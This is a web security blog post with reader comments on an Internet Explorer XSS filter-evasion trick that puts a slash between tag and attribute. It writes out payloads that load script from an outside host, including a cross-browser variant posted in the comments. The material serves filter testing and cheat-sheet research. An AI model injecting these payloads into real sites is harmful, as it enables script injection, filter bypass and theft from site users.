Cenzic 232 Patent
Paid Advertising
web application security lab

Non-Alpha-Non-Digit 3

Yair Amit brought something to my attention today which actually required me to add a vector to the Cheat Sheet. I got a lot of people asking me to make changes and amendments to the cheat sheet, as you can probably guess so to actually get me to do it requires something new. Yair at first began describing a known issue about Non-alpha-non-digit, which is a little ho-hum at this point, but after a few email exchanges he came up with something that actually is new. The Non-alpha-non-digit 3 XSS vector.

In the Internet Explorer rendering engine (IE6.0-7.0 and Netscape 8.0+ in IE mode) a tag and a parameter can be separated by a slash. This might sound like old news, but unlike the original non-alpha-non-digit vector this does not require a space:

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Although it’s only useful in the Internet Explorer rendering engine it’s a nice vector as it a) obfuscates where the tag and the parameter start and end and b) doesn’t require any spaces. I’m absolutely positive this will cause some XSS filters to fail, so take heed if you use whitespace to test where tags end. Thanks to Yair! Nice find!

8 Responses to “Non-Alpha-Non-Digit 3”

  1. SystemOfAHack Says:

    Any within about a minute, surely enough, cross-browser’d:

    [code]

    [/code]

    Works (locally) for me in FF2 and IE7. As before, no spaces. I’m guessing IE reads the first SRC attrib and ignores the second, wheras FF reads the attribs /SRC and SRC, whereby only SRC is understood.
    Only problem is the use of quotes to encapsulate the src of the js file, wihtout these it would be trickier to get around, but that’s up to someone else to figure out…

  2. SystemOfAHack Says:

    Erm, my code didn’t show… wtf?

  3. RSnake Says:

    WordPress doesn’t use bbcode… you have to type &lt; if you want a < etc…

  4. SystemOfAHack Says:

    And again… for a second I thought I’d acidentally XSS’d this bad boy :p, anyways I’ve had to upload the code here: http://xssxss.1111mb.com/Non-Alpha-Non-Digit-3-crossBrowser.html

  5. SystemOfAHack Says:

    Yeah sorry; stupid mistake, didn’t realise about the <tag> thing, i thought it auto converted them but nvm…

  6. yawnmoth Says:

    I’m not so sure I agree with your assertion that this isn’t already mentioned in the XSS cheat sheet. The first Non-alpha-non-digit XSS demonstrates two distinct vectors - one only works in IE and the other only works on FireFox. The third Non-alpha-non-digit XSS mentioned in this blog post is of the former. The following URL elaborates (it was written as a response to this posting):

    http://www.frostjedi.com/terra/xss.htm

    (forgive the poor formating - it was originally posted on a private message board; I’ve edited out everything save for the actual posts contents)

  7. yawnmoth Says:

    Thinking about it… per my last post, maybe you should just remove the first Non-alpha-non-digit XSS. The two other Non-alpha-non-digit XSS’s already cover everything the first one does. eg.

    “<script/xss” is seen by IE as “<script xss” because /’s are seen as spaces, as the third Non-alpha-non-digit XSS demonstrates, and “<script/xss” is seen by FireFox as “<script” for the reasons described in the second Non-alpha-non-digit XSS.

  8. SystemOfAHack Says:

    Yeah I agree with yawnmouth. It is very similar to the first listed non-alpha-non-digit xss. This one is sort of a minimisation of the first from what I can tell, resulting in no use of spaces. Deprecate the original non-alpha-non-digit XSS and call this the updated one or something :p

    Also, considering I now know how to post code…… [same as in above link pretty much]
    <script/src=”thisIsForIE.js”src=”thisIsForFF.js”></script>

    This also doubles up as a form of browser detection, and choice of script based on which browser is detected.